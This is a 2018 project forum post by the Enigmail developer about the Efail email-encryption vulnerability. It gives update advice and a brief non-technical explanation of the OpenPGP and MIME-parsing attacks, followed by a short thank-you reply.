Menu

Efail Vulnerability and Enigmail

2018-05-14
2018-05-24
  • Patrick Brunschwig

    Today, information about the Efail vulerability was released. This weakness was adressed in Enigmail 2.0, released in March 2018. Unfortunately, this vulnerability does not only cover Enigmail, but also Thunderbird. Thunderbird is not yet completely fixed today; the developers are still working on fixing the vulnerabiliy on their side.

    I therefore recommend that you install the latest versions of Thunderbird and Enigmail (currently 52.7 and 2.0.3 respectively), and disable viewing HTML mails in Thunderbird via menu View > Message Body as > Plain Text. This will prevent you from any form of the the vulnerability described. Furthermore, once Thunderbird 52.8 will be released, I recommend to upgrade as soon as possible.

    Details

    Thereare two different attacks outlined in the Efail paper. One targets OpenPGP
    directly, and GnuPG has had mitigations against it for almost twenty years. Reports saying that GnuPG is vulnerable are wrong.

    The other one targets buggy MIME parsing by email clients. Enigmail previously had some susceptibility to it, but as of Enigmail 2.0 we've closed up all the leaks on our side of things. There is still an attack surface in Thunderbird. The code to fix that has been checked into Thunderbird and will be part of the next Thunderbird release.

     

    Last edit: Patrick Brunschwig 2018-05-15
  • wildman

    wildman - 2018-05-24

    Thank you for the hard work. Wish more people would use encrypted mail and... donate to the cause!

     

Log in to post a comment.